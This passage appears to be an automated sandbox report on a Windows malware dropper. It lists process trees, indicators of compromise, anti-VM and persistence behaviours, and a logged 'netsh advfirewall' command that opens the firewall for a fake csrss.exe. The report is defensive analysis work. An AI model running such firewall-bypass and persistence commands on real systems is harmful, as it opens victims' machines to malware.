4be26acb64175de7aac5f8d3fc9bcd34111125be51050eb31c5ca72162209df7c4c753f63ec215fc420516b6fb1ab868b4fc2d6455f9d20fca11ec5c08fa2b17e0a2699f5e4692f981d2df5d9a9b21de51b0203010001a3423040300f0603551d130101ff040530030101ff300e0603551d0f0101ff040403020186301d0603551d0e04160414ecd7e382d2715d644cdf2e673fe7ba98ae1c0f4f300d06092a864886f70d01010c05000382020100bb61d97da96cbe17c4911bc3a1a2008de364680f56cf77ae70f9fd9a4a99b9c9785c0c0c5fe4e61429560b36495d4463e0ad9c9618661b230d3d79e96d6bd654f8d23cc14340ae1d50f552fc903bbb9899696bc7c1a7a868a427dc9df927ae3085b9f6674d3a3e8f5939225344ebc85d03caed507a7d62210a80c87366d1a005605fe8a5b4a7afa8f76d359c7c5a8ad6a23899f3788bf44dd2200bde04ee8c9b4781720dc01432ef30592eaee071f256e46a976f92506d968d687a9ab236147a06f224b9091150d708b1b8897a8423614229e5a3cda22041d7d19c64d9ea26a18b14d74c19b25041713d3f4d7023860c4adc81d2cc3294840d0809971c4fc0ee6b207430d2e03934108521150108e85532de7149d92817504de6be4dd175acd0cafb41b843a5aad3c305444f2c369be2fae245b823536c066f67557f46b54c3f6e285a7926d2a4a86297d21ee2ed4a8bbc1bfd474a0ddf67667eb25b41d03be4f43bf40463e9efc2540051a08a2ac9ce78ccd5ea870418b3ceaf4988aff39299b6b3e6610fd28500e7501ae41b959d19a1b99cb19bb1001eefd00f4f426cc90abcee43fa3a71a5c84d26a535fd895dbc85621d32d2a02b54ed9a57c1dbfa10cf19b78b4a1b8f01b6279553e8b6896d5bbc68d423e88b51a256f9f0a680a0d61eb3bc0f0f537529aaea1377e4de8c8121ad07104711ad873d07d175bccff3667e 2MYMzGM0Ir1ZgoCjigWHeOoy.exe -
Suspicious behavior: AddClipboardFormatListener 1 IoCs
Processes:
mstc.exepid process 1876 mstc.exe -
Suspicious behavior: EnumeratesProcesses 64 IoCs
Processes:
fe4ad437c55f75aa1dfc976f986023a3d4c528a9e3cfa74761b465b08d42e086.exeexplorta.exeamert.exechrosha.exeexplorta.exechrome.exe06feb1f97d.exepowershell.exepowershell.exeu2r0.0.exepowershell.exepowershell.exeuon7YhUxbxygHEmdqaGh1jhy.exe91jwA6wQnD20jEFlNGHkRWzr.exerun.exepowershell.exepowershell.exepowershell.exerundll32.exepowershell.exepowershell.execmd.exepid process 2004 fe4ad437c55f75aa1dfc976f986023a3d4c528a9e3cfa74761b465b08d42e086.exe 2004 fe4ad437c55f75aa1dfc976f986023a3d4c528a9e3cfa74761b465b08d42e086.exe 5064 explorta.exe 5064 explorta.exe 2264 amert.exe 2264 amert.exe 4016 chrosha.exe 4016 chrosha.exe 3572 explorta.exe 3572 explorta.exe 4708 chrome.exe 4708 chrome.exe 3036 06feb1f97d.exe 3036 06feb1f97d.exe 5572 powershell.exe 5572 powershell.exe 5540 powershell.exe 5540 powershell.exe 5540 powershell.exe 5572 powershell.exe 5876 u2r0.0.exe 5876 u2r0.0.exe 5804 powershell.exe 5804 powershell.exe 5804 powershell.exe 5836 powershell.exe 5836 powershell.exe 5836 powershell.exe 5156 uon7YhUxbxygHEmdqaGh1jhy.exe 5156 uon7YhUxbxygHEmdqaGh1jhy.exe 5336 91jwA6wQnD20jEFlNGHkRWzr.exe 5336 91jwA6wQnD20jEFlNGHkRWzr.exe 2528 run.exe 2528 run.exe 2528 run.exe 5364 powershell.exe 5364 powershell.exe 5364 powershell.exe 5488 powershell.exe 5488 powershell.exe 5268 powershell.exe 5268 powershell.exe 5268 powershell.exe 5488 powershell.exe 6608 rundll32.exe 6608 rundll32.exe 6608 rundll32.exe 6608 rundll32.exe 6608 rundll32.exe 6608 rundll32.exe 6632 powershell.exe 6632 powershell.exe 6632 powershell.exe 6608 rundll32.exe 6608 rundll32.exe 6608 rundll32.exe 6608 rundll32.exe 6736 powershell.exe 6736 powershell.exe 6736 powershell.exe 5496 cmd.exe 5496 cmd.exe 5496 cmd.exe 5496 cmd.exe -
Suspicious behavior: MapViewOfSection 3 IoCs
Processes:
run.execmd.exepid process 2528 run.exe 5496 cmd.exe 5496 cmd.exe -
Suspicious behavior: NtCreateUserProcessBlockNonMicrosoftBinary 8 IoCs
Processes:
chrome.exechrome.exepid process 4708 chrome.exe 4708 chrome.exe 4708 chrome.exe 4708 chrome.exe 5684 chrome.exe 5684 chrome.exe 5684 chrome.exe 5684 chrome.exe -
Suspicious use of AdjustPrivilegeToken 64 IoCs
Processes:
chrome.exefile300un.exeregasm.exemstc.exepowershell.exepowershell.exepowershell.exepowershell.exeuon7YhUxbxygHEmdqaGh1jhy.exe91jwA6wQnD20jEFlNGHkRWzr.exepowershell.exepowershell.exepowershell.exepowershell.exepowershell.exepowershell.exepowershell.exedescription pid process Token: SeShutdownPrivilege 4708 chrome.exe Token: SeCreatePagefilePrivilege 4708 chrome.exe Token: SeShutdownPrivilege 4708 chrome.exe Token: SeCreatePagefilePrivilege 4708 chrome.exe Token: SeShutdownPrivilege 4708 chrome.exe Token: SeCreatePagefilePrivilege 4708 chrome.exe Token: SeDebugPrivilege 368 file300un.exe Token: SeDebugPrivilege 5056 regasm.exe Token: SeShutdownPrivilege 4708 chrome.exe Token: SeCreatePagefilePrivilege 4708 chrome.exe Token: SeDebugPrivilege 1876 mstc.exe Token: SeShutdownPrivilege 4708 chrome.exe Token: SeCreatePagefilePrivilege 4708 chrome.exe Token: SeShutdownPrivilege 4708 chrome.exe Token: SeCreatePagefilePrivilege 4708 chrome.exe Token: SeDebugPrivilege 5540 powershell.exe Token: SeDebugPrivilege 5572 powershell.exe Token: SeShutdownPrivilege 4708 chrome.exe Token: SeCreatePagefilePrivilege 4708 chrome.exe Token: SeShutdownPrivilege 4708 chrome.exe Token: SeCreatePagefilePrivilege 4708 chrome.exe Token: SeShutdownPrivilege 4708 chrome.exe Token: SeCreatePagefilePrivilege 4708 chrome.exe Token: SeDebugPrivilege 5804 powershell.exe Token: SeShutdownPrivilege 4708 chrome.exe Token: SeCreatePagefilePrivilege 4708 chrome.exe Token: SeDebugPrivilege 5836 powershell.exe Token: SeDebugPrivilege 5156 uon7YhUxbxygHEmdqaGh1jhy.exe Token: SeDebugPrivilege 5336 91jwA6wQnD20jEFlNGHkRWzr.exe Token: SeImpersonatePrivilege 5156 uon7YhUxbxygHEmdqaGh1jhy.exe Token: SeImpersonatePrivilege 5336 91jwA6wQnD20jEFlNGHkRWzr.exe Token: SeShutdownPrivilege 4708 chrome.exe Token: SeCreatePagefilePrivilege 4708 chrome.exe Token: SeShutdownPrivilege 4708 chrome.exe Token: SeCreatePagefilePrivilege 4708 chrome.exe Token: SeDebugPrivilege 5364 powershell.exe Token: SeDebugPrivilege 5488 powershell.exe Token: SeDebugPrivilege 5268 powershell.exe Token: SeShutdownPrivilege 4708 chrome.exe Token: SeCreatePagefilePrivilege 4708 chrome.exe Token: SeShutdownPrivilege 4708 chrome.exe Token: SeCreatePagefilePrivilege 4708 chrome.exe Token: SeShutdownPrivilege 4708 chrome.exe Token: SeCreatePagefilePrivilege 4708 chrome.exe Token: SeDebugPrivilege 6632 powershell.exe Token: SeShutdownPrivilege 4708 chrome.exe Token: SeCreatePagefilePrivilege 4708 chrome.exe Token: SeDebugPrivilege 6736 powershell.exe Token: SeShutdownPrivilege 4708 chrome.exe Token: SeCreatePagefilePrivilege 4708 chrome.exe Token: SeShutdownPrivilege 4708 chrome.exe Token: SeCreatePagefilePrivilege 4708 chrome.exe Token: SeShutdownPrivilege 4708 chrome.exe Token: SeCreatePagefilePrivilege 4708 chrome.exe Token: SeShutdownPrivilege 4708 chrome.exe Token: SeCreatePagefilePrivilege 4708 chrome.exe Token: SeDebugPrivilege 6420 powershell.exe Token: SeShutdownPrivilege 4708 chrome.exe Token: SeCreatePagefilePrivilege 4708 chrome.exe Token: SeDebugPrivilege 5656 powershell.exe Token: SeShutdownPrivilege 4708 chrome.exe Token: SeCreatePagefilePrivilege 4708 chrome.exe Token: SeDebugPrivilege 1876 mstc.exe Token: SeShutdownPrivilege 4708 chrome.exe -
Suspicious use of FindShellTrayWindow 64 IoCs
Processes:
d89781e451.exechrome.exeu2r0.3.exepid process 4640 d89781e451.exe 4640 d89781e451.exe 4640 d89781e451.exe 4708 chrome.exe 4708 chrome.exe 4708 chrome.exe 4708 chrome.exe 4708 chrome.exe 4708 chrome.exe 4708 chrome.exe 4708 chrome.exe 4708 chrome.exe 4708 chrome.exe 4708 chrome.exe 4708 chrome.exe 4708 chrome.exe 4708 chrome.exe 4708 chrome.exe 4708 chrome.exe 4708 chrome.exe 4708 chrome.exe 4708 chrome.exe 4708 chrome.exe 4708 chrome.exe 4708 chrome.exe 4708 chrome.exe 4708 chrome.exe 4708 chrome.exe 4708 chrome.exe 4640 d89781e451.exe 4640 d89781e451.exe 4708 chrome.exe 4640 d89781e451.exe 4640 d89781e451.exe 4640 d89781e451.exe 4640 d89781e451.exe 4640 d89781e451.exe 4640 d89781e451.exe 4640 d89781e451.exe 4640 d89781e451.exe 4640 d89781e451.exe 4640 d89781e451.exe 4640 d89781e451.exe 4640 d89781e451.exe 4640 d89781e451.exe 4640 d89781e451.exe 6272 u2r0.3.exe 6272 u2r0.3.exe 6272 u2r0.3.exe 6272 u2r0.3.exe 6272 u2r0.3.exe 6272 u2r0.3.exe 6272 u2r0.3.exe 4640 d89781e451.exe 4640 d89781e451.exe 4640 d89781e451.exe 4640 d89781e451.exe 4640 d89781e451.exe 4640 d89781e451.exe 4640 d89781e451.exe 4640 d89781e451.exe 4640 d89781e451.exe 4640 d89781e451.exe 4640 d89781e451.exe -
Suspicious use of SendNotifyMessage 64 IoCs
Processes:
d89781e451.exechrome.exeu2r0.3.exepid process 4640 d89781e451.exe 4640 d89781e451.exe 4640 d89781e451.exe 4708 chrome.exe 4708 chrome.exe 4708 chrome.exe 4708 chrome.exe 4708 chrome.exe 4708 chrome.exe 4708 chrome.exe 4708 chrome.exe 4708 chrome.exe 4708 chrome.exe 4708 chrome.exe 4708 chrome.exe 4708 chrome.exe 4708 chrome.exe 4708 chrome.exe 4708 chrome.exe 4708 chrome.exe 4708 chrome.exe 4708 chrome.exe 4708 chrome.exe 4708 chrome.exe 4708 chrome.exe 4708 chrome.exe 4708 chrome.exe 4640 d89781e451.exe 4640 d89781e451.exe 4640 d89781e451.exe 4640 d89781e451.exe 4640 d89781e451.exe 4640 d89781e451.exe 4640 d89781e451.exe 4640 d89781e451.exe 4640 d89781e451.exe 4640 d89781e451.exe 4640 d89781e451.exe 4640 d89781e451.exe 4640 d89781e451.exe 4640 d89781e451.exe 4640 d89781e451.exe 4640 d89781e451.exe 6272 u2r0.3.exe 6272 u2r0.3.exe 6272 u2r0.3.exe 6272 u2r0.3.exe 6272 u2r0.3.exe 6272 u2r0.3.exe 6272 u2r0.3.exe 4640 d89781e451.exe 4640 d89781e451.exe 4640 d89781e451.exe 4640 d89781e451.exe 4640 d89781e451.exe 4640 d89781e451.exe 4640 d89781e451.exe 4640 d89781e451.exe 4640 d89781e451.exe 4640 d89781e451.exe 4640 d89781e451.exe 4640 d89781e451.exe 4640 d89781e451.exe 4640 d89781e451.exe -
Suspicious use of SetWindowsHookEx 4 IoCs
Processes:
run.exemstc.exeMSBuild.exepid process 2528 run.exe 2528 run.exe 1876 mstc.exe 1456 MSBuild.exe -
Suspicious use of WriteProcessMemory 64 IoCs
Processes:
fe4ad437c55f75aa1dfc976f986023a3d4c528a9e3cfa74761b465b08d42e086.exeexplorta.exed89781e451.exechrome.exedescription pid process target process PID 2004 wrote to memory of 5064 2004 fe4ad437c55f75aa1dfc976f986023a3d4c528a9e3cfa74761b465b08d42e086.exe explorta.exe PID 2004 wrote to memory of 5064 2004 fe4ad437c55f75aa1dfc976f986023a3d4c528a9e3cfa74761b465b08d42e086.exe explorta.exe PID 2004 wrote to memory of 5064 2004 fe4ad437c55f75aa1dfc976f986023a3d4c528a9e3cfa74761b465b08d42e086.exe explorta.exe PID 5064 wrote to memory of 4456 5064 explorta.exe explorta.exe PID 5064 wrote to memory of 4456 5064 explorta.exe explorta.exe PID 5064 wrote to memory of 4456 5064 explorta.exe explorta.exe PID 5064 wrote to memory of 2264 5064 explorta.exe amert.exe PID 5064 wrote to memory of 2264 5064 explorta.exe amert.exe PID 5064 wrote to memory of 2264 5064 explorta.exe amert.exe PID 5064 wrote to memory of 4640 5064 explorta.exe d89781e451.exe PID 5064 wrote to memory of 4640 5064 explorta.exe d89781e451.exe PID 5064 wrote to memory of 4640 5064 explorta.exe d89781e451.exe PID 4640 wrote to memory of 4708 4640 d89781e451.exe chrome.exe PID 4640 wrote to memory of 4708 4640 d89781e451.exe chrome.exe PID 4708 wrote to memory of 4976 4708 chrome.exe chrome.exe PID 4708 wrote to memory of 4976 4708 chrome.exe chrome.exe PID 4708 wrote to memory of 2180 4708 chrome.exe chrome.exe PID 4708 wrote to memory of 2180 4708 chrome.exe chrome.exe PID 4708 wrote to memory of 2180 4708 chrome.exe chrome.exe PID 4708 wrote to memory of 2180 4708 chrome.exe chrome.exe PID 4708 wrote to memory of 2180 4708 chrome.exe chrome.exe PID 4708 wrote to memory of 2180 4708 chrome.exe chrome.exe PID 4708 wrote to memory of 2180 4708 chrome.exe chrome.exe PID 4708 wrote to memory of 2180 4708 chrome.exe chrome.exe PID 4708 wrote to memory of 2180 4708 chrome.exe chrome.exe PID 4708 wrote to memory of 2180 4708 chrome.exe chrome.exe PID 4708 wrote to memory of 2180 4708 chrome.exe chrome.exe PID 4708 wrote to memory of 2180 4708 chrome.exe chrome.exe PID 4708 wrote to memory of 2180 4708 chrome.exe chrome.exe PID 4708 wrote to memory of 2180 4708 chrome.exe chrome.exe PID 4708 wrote to memory of 2180 4708 chrome.exe chrome.exe PID 4708 wrote to memory of 2180 4708 chrome.exe chrome.exe PID 4708 wrote to memory of 2180 4708 chrome.exe chrome.exe PID 4708 wrote to memory of 2180 4708 chrome.exe chrome.exe PID 4708 wrote to memory of 2180 4708 chrome.exe chrome.exe PID 4708 wrote to memory of 2180 4708 chrome.exe chrome.exe PID 4708 wrote to memory of 2180 4708 chrome.exe chrome.exe PID 4708 wrote to memory of 2180 4708 chrome.exe chrome.exe PID 4708 wrote to memory of 2180 4708 chrome.exe chrome.exe PID 4708 wrote to memory of 2180 4708 chrome.exe chrome.exe PID 4708 wrote to memory of 2180 4708 chrome.exe chrome.exe PID 4708 wrote to memory of 2180 4708 chrome.exe chrome.exe PID 4708 wrote to memory of 2180 4708 chrome.exe chrome.exe PID 4708 wrote to memory of 2180 4708 chrome.exe chrome.exe PID 4708 wrote to memory of 2180 4708 chrome.exe chrome.exe PID 4708 wrote to memory of 2180 4708 chrome.exe chrome.exe PID 4708 wrote to memory of 2180 4708 chrome.exe chrome.exe PID 4708 wrote to memory of 4836 4708 chrome.exe chrome.exe PID 4708 wrote to memory of 4836 4708 chrome.exe chrome.exe PID 4708 wrote to memory of 4996 4708 chrome.exe chrome.exe PID 4708 wrote to memory of 4996 4708 chrome.exe chrome.exe PID 4708 wrote to memory of 4996 4708 chrome.exe chrome.exe PID 4708 wrote to memory of 4996 4708 chrome.exe chrome.exe PID 4708 wrote to memory of 4996 4708 chrome.exe chrome.exe PID 4708 wrote to memory of 4996 4708 chrome.exe chrome.exe PID 4708 wrote to memory of 4996 4708 chrome.exe chrome.exe PID 4708 wrote to memory of 4996 4708 chrome.exe chrome.exe PID 4708 wrote to memory of 4996 4708 chrome.exe chrome.exe PID 4708 wrote to memory of 4996 4708 chrome.exe chrome.exe PID 4708 wrote to memory of 4996 4708 chrome.exe chrome.exe PID 4708 wrote to memory of 4996 4708 chrome.exe chrome.exe PID 4708 wrote to memory of 4996 4708 chrome.exe chrome.exe PID 4708 wrote to memory of 4996 4708 chrome.exe chrome.exe PID 4708 wrote to memory of 4996 4708 chrome.exe chrome.exe -
Uses Task Scheduler COM API 1 TTPs
The Task Scheduler COM API can be used to schedule applications to run on boot or at set times.
Processes
-
C:\Users\Admin\AppData\Local\Temp\fe4ad437c55f75aa1dfc976f986023a3d4c528a9e3cfa74761b465b08d42e086.exe"C:\Users\Admin\AppData\Local\Temp\fe4ad437c55f75aa1dfc976f986023a3d4c528a9e3cfa74761b465b08d42e086.exe"1⤵
- Identifies VirtualBox via ACPI registry values (likely anti-VM)
- Checks BIOS information in registry
- Checks computer location settings
- Identifies Wine through registry keys
- Suspicious use of NtSetInformationThreadHideFromDebugger
- Drops file in Windows directory
- Suspicious behavior: EnumeratesProcesses
- Suspicious use of WriteProcessMemory
-
C:\Users\Admin\AppData\Local\Temp\5454e6f062\explorta.exe"C:\Users\Admin\AppData\Local\Temp\5454e6f062\explorta.exe"2⤵
- Identifies VirtualBox via ACPI registry values (likely anti-VM)
- Checks BIOS information in registry
- Checks computer location settings
- Executes dropped EXE
- Identifies Wine through registry keys
- Adds Run key to start application
- Suspicious use of NtSetInformationThreadHideFromDebugger
- Suspicious behavior: EnumeratesProcesses
- Suspicious use of WriteProcessMemory
-
C:\Users\Admin\AppData\Local\Temp\5454e6f062\explorta.exe"C:\Users\Admin\AppData\Local\Temp\5454e6f062\explorta.exe"3⤵
-
C:\Users\Admin\AppData\Local\Temp\1000015001\amert.exe"C:\Users\Admin\AppData\Local\Temp\1000015001\amert.exe"3⤵
- Identifies VirtualBox via ACPI registry values (likely anti-VM)
- Checks BIOS information in registry
- Executes dropped EXE
- Identifies Wine through registry keys
- Suspicious use of NtSetInformationThreadHideFromDebugger
- Drops file in Windows directory
- Suspicious behavior: EnumeratesProcesses
-
C:\Users\Admin\AppData\Local\Temp\1000016001\d89781e451.exe"C:\Users\Admin\AppData\Local\Temp\1000016001\d89781e451.exe"3⤵
- Checks computer location settings
- Executes dropped EXE
- Suspicious use of FindShellTrayWindow
- Suspicious use of SendNotifyMessage
- Suspicious use of WriteProcessMemory
-
C:\Program Files\Google\Chrome\Application\chrome.exe"C:\Program Files\Google\Chrome\Application\chrome.exe" https://www.youtube.com/account4⤵
- Enumerates system info in registry
- Modifies data under HKEY_USERS
- Suspicious behavior: EnumeratesProcesses
- Suspicious behavior: NtCreateUserProcessBlockNonMicrosoftBinary
- Suspicious use of AdjustPrivilegeToken
- Suspicious use of FindShellTrayWindow
- Suspicious use of SendNotifyMessage
- Suspicious use of WriteProcessMemory
-
C:\Program Files\Google\Chrome\Application\chrome.exe"C:\Program Files\Google\Chrome\Application\chrome.exe" --type=crashpad-handler "--user-data-dir=C:\Users\Admin\AppData\Local\Google\Chrome\User Data" /prefetch:7 --monitor-self-annotation=ptype=crashpad-handler "--database=C:\Users\Admin\AppData\Local\Google\Chrome\User Data\Crashpad" "--metrics-dir=C:\Users\Admin\AppData\Local\Google\Chrome\User Data" --url=https://clients2.google.com/cr/report --annotation=channel= --annotation=plat=Win64 --annotation=prod=Chrome --annotation=ver=110.0.5481.104 --initial-client-data=0xfc,0x100,0x104,0xd8,0x108,0x7ff8f91aab58,0x7ff8f91aab68,0x7ff8f91aab785⤵
-
C:\Program Files\Google\Chrome\Application\chrome.exe"C:\Program Files\Google\Chrome\Application\chrome.exe" --type=gpu-process --gpu-preferences=UAAAAAAAAADgAAAYAAAAAAAAAAAAAAAAAABgAAAAAAAwAAAAAAAAAAAAAAAQAAAAAAAAAAAAAAAAAAAAAAAAAEgAAAAAAAAASAAAAAAAAAAYAAAAAgAAABAAAAAAAAAAGAAAAAAAAAAQAAAAAAAAAAAAAAAOAAAAEAAAAAAAAAABAAAADgAAAAgAAAAAAAAACAAAAAAAAAA= --mojo-platform-channel-handle=1680 --field-trial-handle=1928,i,1602049362784519798,10145341899150502544,131072 /prefetch:25⤵
-
C:\Program Files\Google\Chrome\Application\chrome.exe"C:\Program Files\Google\Chrome\Application\chrome.exe" --type=utility --utility-sub-type=network.mojom.NetworkService --lang=en-US --service-sandbox-type=none --mojo-platform-channel-handle=2152 --field-trial-handle=1928,i,1602049362784519798,10145341899150502544,131072 /prefetch:85⤵
-
C:\Program Files\Google\Chrome\Application\chrome.exe"C:\Program Files\Google\Chrome\Application\chrome.exe" --type=utility --utility-sub-type=storage.mojom.StorageService --lang=en-US --service-sandbox-type=service --mojo-platform-channel-handle=2192 --field-trial-handle=1928,i,1602049362784519798,10145341899150502544,131072 /prefetch:85⤵
-
C:\Program Files\Google\Chrome\Application\chrome.exe"C:\Program Files\Google\Chrome\Application\chrome.exe" --type=renderer --first-renderer-process --lang=en-US --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=6 --mojo-platform-channel-handle=3096 --field-trial-handle=1928,i,1602049362784519798,10145341899150502544,131072 /prefetch:15⤵
-
C:\Program Files\Google\Chrome\Application\chrome.exe"C:\Program Files\Google\Chrome\Application\chrome.exe" --type=renderer --lang=en-US --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=5 --mojo-platform-channel-handle=3108 --field-trial-handle=1928,i,1602049362784519798,10145341899150502544,131072 /prefetch:15⤵
-
C:\Program Files\Google\Chrome\Application\chrome.exe"C:\Program Files\Google\Chrome\Application\chrome.exe" --type=renderer --lang=en-US --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=7 --mojo-platform-channel-handle=4420 --field-trial-handle=1928,i,1602049362784519798,10145341899150502544,131072 /prefetch:15⤵
-
C:\Program Files\Google\Chrome\Application\chrome.exe"C:\Program Files\Google\Chrome\Application\chrome.exe" --type=renderer --lang=en-US --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=8 --mojo-platform-channel-handle=4652 --field-trial-handle=1928,i,1602049362784519798,10145341899150502544,131072 /prefetch:15⤵
-
C:\Program Files\Google\Chrome\Application\chrome.exe"C:\Program Files\Google\Chrome\Application\chrome.exe" --type=utility --utility-sub-type=audio.mojom.AudioService --lang=en-US --service-sandbox-type=audio --mojo-platform-channel-handle=4700 --field-trial-handle=1928,i,1602049362784519798,10145341899150502544,131072 /prefetch:85⤵
-
C:\Program Files\Google\Chrome\Application\chrome.exe"C:\Program Files\Google\Chrome\Application\chrome.exe" --type=utility --utility-sub-type=video_capture.mojom.VideoCaptureService --lang=en-US --service-sandbox-type=none --mojo-platform-channel-handle=4784 --field-trial-handle=1928,i,1602049362784519798,10145341899150502544,131072 /prefetch:85⤵
- Modifies registry class
-
C:\Program Files\Google\Chrome\Application\chrome.exe"C:\Program Files\Google\Chrome\Application\chrome.exe" --type=utility --utility-sub-type=chrome.mojom.ProcessorMetrics --lang=en-US --service-sandbox-type=none --mojo-platform-channel-handle=4332 --field-trial-handle=1928,i,1602049362784519798,10145341899150502544,131072 /prefetch:85⤵
-
C:\Program Files\Google\Chrome\Application\chrome.exe"C:\Program Files\Google\Chrome\Application\chrome.exe" --type=utility --utility-sub-type=chrome.mojom.UtilWin --lang=en-US --service-sandbox-type=none --mojo-platform-channel-handle=5068 --field-trial-handle=1928,i,1602049362784519798,10145341899150502544,131072 /prefetch:85⤵
-
C:\Program Files\Google\Chrome\Application\chrome.exe"C:\Program Files\Google\Chrome\Application\chrome.exe" --type=utility --utility-sub-type=data_decoder.mojom.DataDecoderService --lang=en-US --service-sandbox-type=service --mojo-platform-channel-handle=5188 --field-trial-handle=1928,i,1602049362784519798,10145341899150502544,131072 /prefetch:85⤵
-
C:\Program Files\Google\Chrome\Application\chrome.exe"C:\Program Files\Google\Chrome\Application\chrome.exe" --type=utility --utility-sub-type=chrome.mojom.UtilWin --lang=en-US --service-sandbox-type=none --mojo-platform-channel-handle=4776 --field-trial-handle=1928,i,1602049362784519798,10145341899150502544,131072 /prefetch:85⤵
-
C:\Program Files\Google\Chrome\Application\chrome.exe"C:\Program Files\Google\Chrome\Application\chrome.exe" --type=utility --utility-sub-type=chrome.mojom.UtilWin --lang=en-US --service-sandbox-type=none --mojo-platform-channel-handle=5044 --field-trial-handle=1928,i,1602049362784519798,10145341899150502544,131072 /prefetch:85⤵
-
C:\Users\Admin\1000017002\06feb1f97d.exe"C:\Users\Admin\1000017002\06feb1f97d.exe"3⤵
- Identifies VirtualBox via ACPI registry values (likely anti-VM)
- Checks BIOS information in registry
- Executes dropped EXE
- Identifies Wine through registry keys
- Suspicious use of NtSetInformationThreadHideFromDebugger
- Suspicious behavior: EnumeratesProcesses
-
C:\Users\Admin\AppData\Local\Temp\5454e6f062\explorta.exeC:\Users\Admin\AppData\Local\Temp\5454e6f062\explorta.exe1⤵
- Identifies VirtualBox via ACPI registry values (likely anti-VM)
- Checks BIOS information in registry
- Executes dropped EXE
- Identifies Wine through registry keys
- Suspicious use of NtSetInformationThreadHideFromDebugger
- Suspicious behavior: EnumeratesProcesses
-
C:\Users\Admin\AppData\Local\Temp\4d0ab15804\chrosha.exeC:\Users\Admin\AppData\Local\Temp\4d0ab15804\chrosha.exe1⤵
- Identifies VirtualBox via ACPI registry values (likely anti-VM)
- Checks BIOS information in registry
- Checks computer location settings
- Executes dropped EXE
- Identifies Wine through registry keys
- Suspicious use of NtSetInformationThreadHideFromDebugger
- Suspicious behavior: EnumeratesProcesses
-
C:\Users\Admin\AppData\Local\Temp\1000238001\file300un.exe"C:\Users\Admin\AppData\Local\Temp\1000238001\file300un.exe"2⤵
- Executes dropped EXE
- Suspicious use of SetThreadContext
- Suspicious use of AdjustPrivilegeToken
-
C:\Windows\Microsoft.NET\Framework\v4.0.30319\regasm.exe"C:\Windows\Microsoft.NET\Framework\v4.0.30319\regasm.exe"3⤵
- Checks computer location settings
- Drops startup file
- Suspicious use of AdjustPrivilegeToken
-
C:\Users\Admin\Pictures\ZleUyzy9WRVICP6WvVkSUjzN.exe"C:\Users\Admin\Pictures\ZleUyzy9WRVICP6WvVkSUjzN.exe"4⤵
- Checks computer location settings
- Executes dropped EXE
-
C:\Users\Admin\AppData\Local\Temp\u2r0.0.exe"C:\Users\Admin\AppData\Local\Temp\u2r0.0.exe"5⤵
- Executes dropped EXE
- Loads dropped DLL
- Checks processor information in registry
- Suspicious behavior: EnumeratesProcesses
-
C:\Windows\SysWOW64\WerFault.exeC:\Windows\SysWOW64\WerFault.exe -u -p 5876 -s 26766⤵
- Program crash
-
C:\Users\Admin\AppData\Local\Temp\u2r0.2\run.exe"C:\Users\Admin\AppData\Local\Temp\u2r0.2\run.exe"5⤵
- Executes dropped EXE
- Loads dropped DLL
- Suspicious use of SetThreadContext
- Suspicious behavior: EnumeratesProcesses
- Suspicious behavior: MapViewOfSection
- Suspicious use of SetWindowsHookEx
-
C:\Windows\SysWOW64\cmd.exeC:\Windows\SysWOW64\cmd.exe6⤵
- Suspicious use of SetThreadContext
- Suspicious behavior: EnumeratesProcesses
- Suspicious behavior: MapViewOfSection
-
C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exeC:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe7⤵
- Suspicious use of SetWindowsHookEx
-
C:\Users\Admin\AppData\Local\Temp\u2r0.3.exe"C:\Users\Admin\AppData\Local\Temp\u2r0.3.exe"5⤵
- Checks computer location settings
- Executes dropped EXE
- Checks SCSI registry key(s)
- Suspicious use of FindShellTrayWindow
- Suspicious use of SendNotifyMessage
-
C:\Users\Admin\AppData\Local\Temp\iolo\dm\SystemMechanic_5488CB36-BE62-4606-B07B-2EE938868BD1.exe"C:\Users\Admin\AppData\Local\Temp\iolo\dm\SystemMechanic_5488CB36-BE62-4606-B07B-2EE938868BD1.exe" /eieci=11A12794-499E-4FA0-A281-A9A9AA8B2685 /eipi=5488CB36-BE62-4606-B07B-2EE938868BD16⤵
-
C:\Windows\SysWOW64\WerFault.exeC:\Windows\SysWOW64\WerFault.exe -u -p 3564 -s 9925⤵
- Program crash
-
C:\Users\Admin\Pictures\uon7YhUxbxygHEmdqaGh1jhy.exe"C:\Users\Admin\Pictures\uon7YhUxbxygHEmdqaGh1jhy.exe"4⤵
- Executes dropped EXE
- Suspicious behavior: EnumeratesProcesses
- Suspicious use of AdjustPrivilegeToken
-
C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exepowershell -nologo -noprofile5⤵
- Suspicious behavior: EnumeratesProcesses
- Suspicious use of AdjustPrivilegeToken
-
C:\Users\Admin\Pictures\uon7YhUxbxygHEmdqaGh1jhy.exe"C:\Users\Admin\Pictures\uon7YhUxbxygHEmdqaGh1jhy.exe"5⤵
- Executes dropped EXE
- Adds Run key to start application
- Checks for VirtualBox DLLs, possible anti-VM trick
- Drops file in Windows directory
- Modifies data under HKEY_USERS
-
C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exepowershell -nologo -noprofile6⤵
- Drops file in System32 directory
- Modifies data under HKEY_USERS
- Suspicious behavior: EnumeratesProcesses
- Suspicious use of AdjustPrivilegeToken
-
C:\Windows\system32\cmd.exeC:\Windows\Sysnative\cmd.exe /C "netsh advfirewall firewall add rule name="csrss" dir=in action=allow program="C:\Windows\rss\csrss.exe" enable=yes"6⤵
-
C:\Windows\system32\netsh.exenetsh advfirewall firewall add rule name="csrss" dir=in action=allow program="C:\Windows\rss\csrss.exe" enable=yes7⤵
- Modifies Windows Firewall
-
C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exepowershell -nologo -noprofile6⤵
- Drops file in System32 directory
- Modifies data under HKEY_USERS
-
C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exepowershell -nologo -noprofile6⤵
- Drops file in System32 directory
- Modifies data under HKEY_USERS
-
C:\Windows\System32\Conhost.exe\??\C:\Windows\system32\conhost.exe 0xffffffff -ForceV17⤵
-
C:\Windows\rss\csrss.exeC:\Windows\rss\csrss.exe6⤵
- Executes dropped EXE
- Adds Run key to start application
- Manipulates WinMonFS driver.
- Drops file in Windows directory
-
